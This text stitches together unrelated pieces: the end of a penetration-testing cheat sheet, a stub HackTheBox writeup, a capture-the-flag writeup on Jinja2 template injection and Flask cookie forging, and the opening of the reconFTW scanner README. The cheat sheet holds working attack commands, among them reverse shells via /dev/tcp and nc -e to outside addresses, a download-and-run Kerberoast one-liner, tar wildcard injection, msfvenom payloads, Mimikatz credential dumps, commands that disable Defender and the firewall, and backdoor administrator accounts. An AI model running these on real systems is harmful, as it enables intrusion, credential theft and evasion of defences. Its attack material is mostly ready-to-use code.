- Add to sudo group
- `usermod -aG sudo root1`
### Program Hijack
#### Python
- import library priority
1. local file
2. `python -c "import sys;print(sys.path)"`
- Check file permission if it can be write
- Fake library file
```python
import pty
pty.spawn("/bin/bash")
```
#### Bash
- Relative path is from `$PATH`
- We can modify this by
- `PATH=/my/fake/path:$PATH ./binary`
- Fake path can contain the shell/reverse shell command file
### IP Tables
- Clear all rull
```bash
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F
iptables -X
```
- Check open port
- `netstat -tulpn | grep LISTEN`
### Program
- `tar` Wildcard
- `echo "bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'" > shell.sh`
- `chmod 777 shell.sh`
- `echo "" > "--checkpoint-action=exec=sh shell.sh"`
- `echo "" > --checkpoint=1`
- `tar cf archive.tar *`
### Capability
- If the program has some special capability
- https://man7.org/linux/man-pages/man7/capabilities.7.html
- `CAP_SETUID`
- Can do with [GTFOBins](https://gtfobins.github.io/)
### Doas
- `doas.conf`
- if exist `permit nopass {user} as {root} cmd {binary}`
- We can `doas {binary}` and it will run as root
### SSH `authorized_keys` Brute force
- `/var/backups/ssh/authorized_keys` or `~/.ssh/authorized_keys`
- https://gitbook.brainyou.stream/basic-linux/ssh-key-predictable-prng-authorized_keys-process
- `git clone https://github.com/g0tmi1k/debian-ssh`
- `tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2`
- `cd debian-ssh/common_keys/dsa/1024/`
- `grep -lr '{keys}'`
- Find the file name without `.pub` is secret key
### Docker
- `/.dockerenv`
- If exist, probably in docker
- Notice mount point
- Mount data `/proc/1/mountinfo` , `/proc/self/mounts` (LFI can read)
### SOP
- Check `sudo -l`
- What file we can run as super user
- Check crontab
- `cat /etc/crontab `
- With LinEnum, LinPeas
- PsPy check
- Check SUID / SGID
- `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`
- `find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null`
- With [GTFOBins](https://gtfobins.github.io/)
- Check sudo version
- [CVE-2019-14287](https://www.exploit-db.com/exploits/47502)
- sudo < 1.8.28
- `sudo -u#-1 binary`
- [CVE-2010-0426](https://github.com/t0kx/privesc-CVE-2010-0426) Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4
- sudoedit
- Check $PATH / import library permission
- Program Hijack
- Check capability
- `getcap -r / 2>/dev/null`
- Check if the program has some useful capability
- Check backup file
## Privilege - Windows
### XP
- [Windows XP SP0/SP1 Privilege Escalation to System](https://sohvaxus.github.io/content/winxp-sp1-privesc.html)
### Exploit
- https://github.com/SecWiki/windows-kernel-exploits
- [EternalBlue MS17-010](https://github.com/helviojunior/MS17-010)
- Prepare msf reverse shell exe
- run `send_and_execute.py`
- Maybe need to change username to `guest`
- If can't reply some port
- use `zzz_exploit.py` , change `smb_pwn` function
- `service_exec(conn,r'cmd /c net user /add meow Me0www')`
- `service_exec(conn,r'cmd /c net localgroup administrators meow /add')`
- [Cerrudo](https://github.com/Re4son/Churrasco)
- Windows Server 2003
- [MS15-051](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip)
- `ms15-051x64.exe whoami`
- [JuicyPotato x64](https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe) , [x86](https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe)
- User have `SeImpersonate` or `SeAssignPrimaryToken` by `whoami /priv`
- `JuicyPotato.exe -l 1337 -p shell7878.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}`
- `-c` (Include curly brackets)
- CLSID from https://ohpe.it/juicy-potato/CLSID/
- `-p` Exe Program
- Not work for Windows Server 2019 and Windows 10 versions 1809 and higher.
- [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)
- Windows Server 2019 and Windows10
- `SeImpersonatePrivilege` Enable
- `PrintSpoofer.exe -i -c cmd`
- [XP SP0 \~ SP1](https://sohvaxus.github.io/content/winxp-sp1-privesc.html)
- `net start SSDPSRV`
- `sc config SSDPSRV start= auto`
- `sc qc SSDPSRV`
- `net start SSDPSRV`
- `sc config upnphost binpath= "C:\{abs_path_for_reverse_shell_exe}`
- `sc config upnphost obj= ".\LocalSystem" password= ""`
- `sc qc upnphost`
- `net start upnphost`
### Bypass UAC
- [CVE-2019-1388](http://blog.leanote.com/post/snowming/38069f423c76)
- [CMSTP UAC Bypass](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html)
- `Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"`
- `[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))`
- `[CMSTPBypass]::Execute("C:\Users\Batman\tshd_windows_amd64.exe -c 10.10.10.10 -p 8787")`
### Bypass CLM
- IF powershell `$ExecutionContext.SessionState.LanguageMode` return `ConstrainedLanguage` = Constrained Language Mode, CLM ; `FullLanguage` = No Limit
- Meterperter
- `load powershell`
- `powershell_shell`
- `$ExecutionContext.SessionState.LanguageMode` -> should return `FullLanguage`
### Registry
- AlwaysInstallElevated
- If both set to 1
- `reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
- `reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
- Can install file with
- `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi`
- `msiexec /quiet /i shellx64.msi`
- But need to check where can install (AppLocker)
- `Get-AppLockerOolicy -Effective | Select -Expandproperty RuleCollections`
- Auto login
- `reg query HKCU\Software\Microsoft\Windows NT\Currentversion\WinLogon /v DefaultUserName`
- `reg query HKCU\Software\Microsoft\Windows NT\Currentversion\WinLogon /v DefaultPassword`
### Defender / Firewall
- 64 bit Powershell
- `%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe`
- Disable Realtime Monitoring
- `Set-MpPreference -DisableRealtimeMonitoring $true`
- Uninstall Defender
- `Uninstall-WindowsFeature -Name Windows-Defender –whatif`
- `Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet`
- Turn off firewall
- `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False`
- Check Defender Status
- `powershell -c Get-MpComputerStatus`
- Check `AntivirusEnabled` is `True` or `False`
### Check vulnerability
- [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
- `systeminfo`
- Run in target machine and save to txt file
- Dependency
- `pip install xlrd==1.2.0`
- `windows-exploit-suggester.py --update`
- Get new database
- `windows-exploit-suggester.py --database {Database file} --systeminfo {systeminfofile}`
- [Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng)
- `systeminfo`
- `python3 wesng.py --update`
- `python3 wesng.py {systeminfofile}`
### Sensitive data
- PowerShell History Path
- `%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt `
- User Home
- Desktop
- Document
- Download
- `C:\Windows\System32\drivers\etc\hosts`
### Process
- `netstat -ano`
- Open Port
- `netstat -an | findstr "LISTENING"`
- `tasklist`
- like ps
- `/v` : list user
### Services
- Query Services
- `sc qc {Services Name}`
- Can get the services user
- Get all services
- `wmic service get name,pathname`
### Permission
- `icacls`
- Check permission
- `/reset` reset the permission to their parent
- [cpau](https://www.joeware.net/freetools/tools/cpau/index.htm)
- `cpau -u {user_name} -p {password} -ex C:\{abs_exe_path} -LWP`
- Run command with given username and password.
- Powershell Invoke-Command
```powershell
$username = 'USER_NAME'
$password = 'PASSWORD'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-command -computername COMPUTER_NAME -credential $credential -scriptblock {cmd.exe /c C:\Users\Public\nc.exe -e cmd.exe 10.1.1.1
5 8877 }
```
- Administrator to System
- It is a feature
- `PsExec -i -s cmd.exe`
- Will creat a new window
- `PsExec -s cmd`
- In current window
- `-accepteula`
- https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
### User
- Create new user
- `net user /add {USER_NAME} {USER_PASS}`
- Add user to admin group
- `net localgroup administrators {USER_NAME} /add`
### AD
- List user
- `net user` Machine
- `net user /domain` AD
- `net user {Username} /domain` list user detail
- List group
- `net group`
- `net group /domain`
- http://md.stevenyu.tw/zeDGpHb-RVSi0K5xF1HRsQ
#### Kerberoast
- Get User Hash
- [Invoke-Kerberoast.ps1](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
- `powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://{MY_IP}/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"`
- `hashcat -m 13100 `
### Get User's hash
- `impacket-smbserver`
- `dir \\{ip}\meow`
- Get NETNTLMv2
- Use john to crack!
- Dump `sam` / `system`
- reg
- `reg save hklm\sam c:\sam`
- `reg save hklm\system c:\system`
- `fgdump.exe` (`locate fgdump.exe`)
- Send to windows and just run
- It will create a `127.0.0.1.pwdump` hash file
- `hashcat -m 1000`
- [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases)
- `privilege::debug`
- `sekurlsa::logonPasswords full`
- Dump current computer passwords
- `lsadump::dcsync /domain:{DOMAIN NAME} /all /csv`
- Dump domain user hash (need domain admin)
- `mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"`
### Powershell
- If got `cannot be loaded because running scripts is disabled on this system`
- type `Set-ExecutionPolicy RemoteSigned`
### Defense Evasion
- Shellter
- Auto Mode : A
- PE Target : `{whoami.exe}`
- Stealth mode : N
- Custom : C
- Payload : `{raw_file}`
- `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f raw > {FILE}.raw`
- DLL Loader : N
- GreatSCT
- Must run in x86 kali
- `use Bypass`
- `msbuild/meterpreter/rev_tcp.py`
- `SET LHOST {IP}`
- `SET LPORT {PORT}`
- `generate`
- Get payload xml (Default : `/usr/share/greatsct-output/source/`)
- `C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {PATH OF XML}`
## Password Crack
### Software
- Hydra
- Crack online services password
- SMB,SSH,FTP......
- Usage
- ssh
- `hydra -l {username} -P {path_to_wordlist} ssh://{ip_address}`
- http{s} Post
- `hydra -l {username} -P {path_to_wordlist} {domain_name_without http/s} http{s}-post-form "{/{path}}:username=^USER^&password=^PASS^&data=data:{string_if_fail}"`
- ftp
- `hydra -l {username} -P {wordlist} ftp://{IP}`
- Cowbar
- `crowbar -b rdp -s {IP}/32 -U {User List} -C {Password List}`
- John the ripper
- Crack hash like `/etc/shadow`
- Support tools
- [ssh2john](https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py)
- gpg2john
- zip2john
- samdump2
- NTLM 2 John
- `samdump2 system sam > j.txt`
- Usage
- `john {file} --wordlist={wordlist}`
- Hashcat
- Crack hash
- https://hashcat.net/wiki/doku.php?id=example_hashes
- `hashcat -m {mode} {hashes.txt} {wordlist.txt}`
- LUKS
- `bruteforce-luks -t 10 -f wordlist.txt -v 5 backup.img`
- `sudo cryptsetup open --type luks backup.img {mount_name}`
- `sudo mount /dev/mapper/{mount_name} mount_point`
### Dictionary
- rockyou.txt
- https://github.com/danielmiessler/SecLists
- [xato-net-10-million-passwords-dup.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/xato-net-10-million-passwords-dup.txt)
- Apache Tomcat
- `/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt`
- `/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt`
- Generate Wordlist
- Cewl
- `cewl http://{IP}/{PATH} | tee wordlist.txt`
### Online
- https://crackstation.net/
- https://hashes.com/en/decrypt/hash
## Software
- RDP
- `xfreerdp +drives /u:{username} /p:{password} /v:{ip}:{port}`
- `/size:1800x1000`
- `/u:{domain\username}`
- FTP
- `ls`
- `get {file_name}`
- `put {file_name}`
- Download recursive
- `wget -r 'ftp://{ip}/{path}/'`
- Unzip
- `.gz`
- `gunzip {filename.gz}`
- tcpdump
- Recv icmp : `sudo tcpdump -i tun0 icmp`
- Capture package : `tcpdump -i {interface} -s 65535 -w {file.pcap}`
- SSH
- No matching host key type found. Their offer `...`
- `ssh -o HostKeyAlgorithms=+{ssh-rsa}`
- No matching key exchange method found. Their offer `...`
- `ssh -o KexAlgorithms=+{diffie-hellman-group1-sha1}`
- No matching cipher found. Their offer `...`
- `ssh -o Ciphers=+{aes128-cbc}`
- Zip Path Traversal
- e.g. ATutor 2.2.1 Directory Traversal
```python
from io import BytesIO
import zipfile
f = BytesIO()
z = zipfile.ZipFile(f,'w',zipfile.ZIP_DEFLATED)
z.writestr('../../../../../../../tmp/meow','meowmeow')
z.close()
with open('poc.zip','wb') as fi:
fi.write(f.getvalue())
```
### Reverse tunnel forwarding
- https://book.hacktricks.xyz/tunneling-and-port-forwarding
- [Chisel](https://github.com/jpillora/chisel)
- Port
- Server : `./chisel server -p {listen_port} --reverse`
- listen port can be random
- Client : `./chisel client {Remote_host}:{listen_port} R:{forward_port_at_attacker}:127.0.0.1:{forward_port}`
- eg. : Remote server run a program at `127.0.0.1:8888`,we need to forward to our attack machine's `127.0.0.1:8888`
- `./chisel server -p 9999 --reverse`
- `./chisel client 10.10.16.35:9999 R:8888:127.0.0.1:8888`
- Proxy
- Server `./chisel server -p {listen_port} --reverse`
- Client `./chisel client {Remote_host}:{listen_port} R:socks`
- Default proxy port : 1080 (sock5)
- Set `socks5 127.0.0.1 1080` to `/etc/proxychains4.conf` or firefox proxy
- Change proxy port to 9487
- Turn last statement to `R:9487:socks`
- SSH
- Port Forwarding
- `ssh -L {forward_port}:127.0.0.1:{forward_port} {remote_user}@{remote_ip} -p {ssh_port} -N -v -v`
- Run in local
- eg : Remote `10.87.87.87` run `5555` in remote local, open `2222` port for ssh, we can use following command to forward `5555` to our local `5555`
- `ssh -L 5555:127.0.0.1:5555 demo@10.87.87.87 -p 2222 -N -v -v`
- Proxy
- `ssh -D 127.0.0.1:{PORT} {USER}@{IP}`
- socks4, can set to proxychains
- nc
- Suppose 192.168.5.2:987 is ssh, and can only accept 53 port
- `ncat -l 1234 --sh-exec 'ncat 192.168.5.2 987 -p 53'`
- `-p 53` means use 53 port to send the data
- `ssh user@127.0.0.1 -p 1234`
## Forensics
- Unknown files
- `file {file_name}`
- `binwalk {file_name}`
- Extract squashfs patch
- `git clone https://github.com/threadexio/sasquatch`
- `./build.sh`
- `-e` Extract
- `xxd {file_name}`
- `foremost {file_name}`
- dd
- `dd if={input_file} bs=1 skip={skip_offset} of={outfile}`
### Steganography
- [stegsolve](https://github.com/zardus/ctf-tools/tree/master/stegsolve)
- [zsteg](https://github.com/zed-0xff/zsteg)
- [steghide](http://steghide.sourceforge.net/)
- `steghide extract -sf {file_name}`
- exiftool
<!-- TODO:
https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files_to_windows.html
--> |
# Meta - HackTheBox - Writeup
Linux, 30 Base Points, Medium
![info.JPG](images/info.JPG)
## Machine
![Meta.JPG](images/Meta.JPG)
## Meta is still an active machine - [Full writeup](Meta-Writeup.pdf) available with root hash password only.
Telegram: [@evyatar9](https://t.me/evyatar9)
Discord: [evyatar9#5800](https://discordapp.com/users/812805349815091251)
![pwn.JPG](images/pwn.JPG) |
# Flag Checker
Web
## Challenge
I made this [really cool flag checker](https://flag_checker.tjctf.org/)! The only way to get in is to guess the flag because I made it super secure... at least I hope I did.
## Solution
After looking around the page, I realised there is a hidden `csrfmiddlewaretoken`.
$ curl -s 'https://flag_checker.tjctf.org/' --data "flag=&csrfmiddlewaretoken=HELLOWORLD" | grep csrfmiddlewaretoken
<input type="hidden" name="csrfmiddlewaretoken" value="HELLOWORLD" />
And trying out some different text injection payloads, I found out Jinja2 `{{ 7*'7' }}` will show us this
$ curl -s 'https://flag_checker.tjctf.org/' --data "flag=&csrfmiddlewaretoken={{ 7*'7' }}" | grep csrfmiddlewaretoken
<input type="hidden" name="csrfmiddlewaretoken" value="7777777" />
This is a Jinja Flask Template Injection
References:
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#basic-injection
- https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti
- http://flask.pocoo.org/docs/1.0/templating/#standard-context
---
Trying out different payloads
{{url_for.__globals__}}
{{url_for.__globals__.os.__dict__}}
{{request.url[23:]}}
{{config}}
And then I realised that {{config}} has something interesting
$ curl 'https://flag_checker.tjctf.org/' --data "flag=&csrfmiddlewaretoken={{config}}"
<input type="hidden" name="csrfmiddlewaretoken" value="<Config {'TRAP_BAD_REQUEST_ERRORS': None, 'SESSION_COOKIE_DOMAIN': False, 'TRAP_HTTP_EXCEPTIONS': False, 'SESSION_REFRESH_EACH_REQUEST': True, 'SERVER_NAME': None, 'PROPAGATE_EXCEPTIONS': None, 'DEBUG': False, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'JSONIFY_MIMETYPE': 'application/json', 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'SECRET_KEY': b'\xd2zX\xe6|S\x90\xc3xi\x88l\x18\xe6zP', 'ENV': 'production', 'JSON_AS_ASCII': True, 'MAX_CONTENT_LENGTH': None, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'USE_X_SENDFILE': False, 'SESSION_COOKIE_PATH': None, 'MAX_COOKIE_SIZE': 4093, 'APPLICATION_ROOT': '/', 'TEMPLATES_AUTO_RELOAD': None, 'PREFERRED_URL_SCHEME': 'http', 'SESSION_COOKIE_HTTPONLY': True, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'SESSION_COOKIE_SECURE': False, 'JSON_SORT_KEYS': True, 'SESSION_COOKIE_NAME': 'session', 'EXPLAIN_TEMPLATE_LOADING': False, 'SESSION_COOKIE_SAMESITE': None}>" />
Look carefully, there is a 'SECRET_KEY' entry. Select it
$ curl 'https://flag_checker.tjctf.org/' --data "flag=&csrfmiddlewaretoken={{config['SECRET_KEY']}}"
<input type="hidden" name="csrfmiddlewaretoken" value="b'\x8eW^\xf6,\x10HW\xe1\xa9\x9f\xc8\xa7\xbd\x9ew'" />
And we retrieved the key
SECRET_KEY = '\xd2zX\xe6|S\x90\xc3xi\x88l\x18\xe6zP'
Now, if we do a curl -v, we can see a cookie..
$ curl -v 'https://flag_checker.tjctf.org/' --data "flag=&csrfmiddlewaretoken={{config['SECRET_KEY']}}"
< set-cookie: session=eyJoYXNfZmxhZyI6ZmFsc2V9.XKnI9A.vNOsL9z4Zc1QwuRbeQjrxKd9UyA; HttpOnly; Path=/
With the secret_key, we are able to decode and re-encode the session cookie:
References:
- https://stackoverflow.com/a/27287455
- https://stackoverflow.com/questions/22463939/demystify-flask-app-secret-key?lq=1
- https://terryvogelsang.tech/MITRECTF2018-my-flask-app/
---
Using this [Github Gist by @aescalana](https://gist.github.com/aescalana/7e0bc39b95baa334074707f73bc64bfe)
Decode the cookie using this code
secret = '\xd2zX\xe6|S\x90\xc3xi\x88l\x18\xe6zP'
cookie = "eyJoYXNfZmxhZyI6ZmFsc2V9.XKnI9A.vNOsL9z4Zc1QwuRbeQjrxKd9UyA"
session = decodeFlaskCookie(secret, cookie)
print 'Decoded original cookie:', session
This prints the following
$ python cookie_decode.py
Decoded original cookie: {u'has_flag': False}
Now, we modify the session cookie to get the flag using this code
session['has_flag'] = True
cookie = encodeFlaskCookie(secret, session)
print 'Decoded new cookie:', decodeFlaskCookie(secret, cookie)
print 'New cookie:', cookie
This prints our modified cookie
$ python cookie_decode.py
Decoded original cookie: {u'has_flag': False}
Decoded new cookie: {u'has_flag': True}
New cookie: eyJoYXNfZmxhZyI6dHJ1ZX0.XKnKvg.kr7eaxh9wJayZLy-txEPm148bw0
Pass the cookie to the server and we get the flag!
$ curl
-v 'https://flag_checker.tjctf.org/'
--data "flag=a"
--cookie "session=eyJoYXNfZmxhZyI6dHJ1ZX0.XKnKMQ.PkbXcTzvyG3A-L6DFIm3nVDfatM"
<p class="lead">
How did you guess that it was tjctf{t3mpl4te_inj3ct10n_is_f4k3_n3w5}?
</p>
## Flag
tjctf{t3mpl4te_inj3ct10n_is_f4k3_n3w5}
Other related references:
- https://ctftime.org/writeup/11014
- https://medium.com/bugbountywriteup/tokyowesterns-ctf-4th-2018-writeup-part-3-1c8510dfad3f
- https://github.com/bl4de/ctf/blob/master/2017/ASIS_CTF_2017/Golem/Golem_Web_writeup.md
- https://stackoverflow.com/questions/2877110/python-new-style-classes-and-subclasses-function
- https://github.com/EmpireCTF/empirectf/blob/master/writeups/2018-09-01-TokyoWesterners-CTF/README.md
- https://hexplo.it/post/escaping-the-csawctf-python-sandbox/
|
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
reconFTW
<br>
</h1>
<p align="center">
<a href="https://github.com/six2dez/reconftw/releases/tag/v2.4">
<img src="https://img.shields.io/badge/release-v2.4-green">
</a>
</a>
<a href="https://www.gnu.org/licenses/gpl-3.0.en.html">
<img src="https://img.shields.io/badge/license-GPL3-_red.svg">
</a>
<a href="https://twitter.com/Six2dez1">
<img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue">
</a>
<a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg">
</a>
<a href="https://github.com/six2dez/reconftw/wiki">
<img src="https://img.shields.io/badge/doc-wiki-blue.svg">
</a>
<a href="https://t.me/joinchat/H5bAaw3YbzzmI5co">
<img src="https://img.shields.io/badge/telegram-@ReconFTW-blue.svg">
</a>
<a href="https://hub.docker.com/r/six2dez/reconftw">
<img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw">
</a>
</p>
<h3 align="center">Summary</h3>
**ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition.
It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target.
So, what are you waiting for Go! Go! Go! :boom:
📔 Table of Contents
-----------------
- [💿 Installation:](#-installation)
- [a) In your PC/VPS/VM](#a-in-your-pcvpsvm)
- [b) Docker Image 🐳 (3 options)](#b-docker-image--3-options)
- [c) Terraform + Ansible](#c-terraform--ansible)
- [⚙️ Config file:](#️-config-file)
- [Usage:](#usage)
- [Example Usage:](#example-usage)
- [Axiom Support: :cloud:](#axiom-support-cloud)
- [BBRF Support: :computer:](#bbrf-support-computer)
- [Sample video:](#sample-video)
- [:fire: Features :fire:](#fire-features-fire)
- [Osint](#osint)
- [Subdomains](#subdomains)
- [Hosts](#hosts)
- [Webs](#webs)
- [Extras](#extras)
- [Mindmap/Workflow](#mindmapworkflow)
- [Data Keep](#data-keep)
- [Main commands:](#main-commands)
- [How to contribute:](#how-to-contribute)
- [Need help? :information_source:](#need-help-information_source)
- [Support this project](#support-this-project)
- [Buymeacoffee](#buymeacoffee)
- [DigitalOcean referral link](#digitalocean-referral-link)
- [GitHub sponsorship](#github-sponsorship)
- [Sponsors ❤️](#sponsors-️)
- [Thanks :pray:](#thanks-pray)
- [Disclaimer](#disclaimer)
---
# 💿 Installation:
## a) In your PC/VPS/VM
> You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book:
- Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**)
```bash
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
```
## b) Docker Image 🐳 (3 options)
- Pull the image
```bash
$ docker pull six2dez/reconftw:main
```
- Run the container
```
$ docker run -it --rm \
-v "${PWD}/OutputFolder/":'/reconftw/Recon/' \
six2dez/reconftw:main -d example.com -r
```
However, if you wish to:
1. Dynamically modify the behaviour & function of the image
2. Build your own container
3. Build an Axiom Controller on top of the official image
Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation.
## c) Terraform + Ansible
Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md)
# ⚙️ Config file:
> A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book:
- Through ```reconftw.cfg``` file the whole execution of the tool can be controlled.
- Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more.
<details>
<br><br>
<summary> :point_right: Click here to view default config file :point_left: </summary>
```yaml
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )"
profile_shell=".$(basename $(echo $SHELL))rc"
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags)
generate_resolvers=false
proxy_url="http://127.0.0.1:8080/"
#dir_output=/custom/output/path
# Golang Vars (Comment or change on your own)
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH
# Tools config files
#NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define
AMASS_CONFIG=~/.config/amass/config.ini
GITHUB_TOKENS=${tools}/.github_tokens
#CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path
# APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line
#SHODAN_API_KEY="XXXXXXXXXXXXX"
#WHOISXML_API="XXXXXXXXXX"
#XSS_SERVER="XXXXXXXXXXXXXXXXX"
#COLLAB_SERVER="XXXXXXXXXXXXXXXXX"
#slack_channel="XXXXXXXX"
#slack_auth="xoXX-XXX-XXX-XXX"
# File descriptors
DEBUG_STD="&>/dev/null"
DEBUG_ERROR="2>/dev/null"
# Osint
OSINT=true
GOOGLE_DORKS=true
GITHUB_DORKS=true
METADATA=true
EMAILS=true
DOMAIN_INFO=true
IP_INFO=true
METAFINDER_LIMIT=20 # Max 250
# Subdomains
SUBDOMAINS_GENERAL=true
SUBPASSIVE=true
SUBCRT=true
SUBANALYTICS=true
SUBBRUTE=true
SUBSCRAPING=true
SUBPERMUTE=true
SUBTAKEOVER=true
SUBRECURSIVE=true
SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries
SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve
ZONETRANSFER=true
S3BUCKETS=true
REVERSE_IP=false
TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,990,992,993,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,6697,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003"
# Web detection
WEBPROBESIMPLE=true
WEBPROBEFULL=true
WEBSCREENSHOT=true
VIRTUALHOSTS=true
UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672"
# You can change to aquatone if gowitness fails, comment the one you don't want
AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot
# Host
FAVICON=true
PORTSCANNER=true
PORTSCAN_PASSIVE=true
PORTSCAN_ACTIVE=true
CDN_IP=true
# Web analysis
WAF_DETECTION=true
NUCLEICHECK=true
NUCLEI_SEVERITY="info,low,medium,high,critical"
URL_CHECK=true
URL_GF=true
URL_EXT=true
JSCHECKS=true
FUZZ=true
CMS_SCANNER=true
WORDLIST=true
ROBOTSWORDLIST=true
PASSWORD_DICT=true
PASSWORD_MIN_LENGTH=5
PASSWORD_MAX_LENGTH=14
# Vulns
VULNS_GENERAL=false
XSS=true
CORS=true
TEST_SSL=true
OPEN_REDIRECT=true
SSRF_CHECKS=true
CRLF_CHECKS=true
LFI=true
SSTI=true
SQLI=true
BROKENLINKS=true
SPRAY=true
COMM_INJ=true
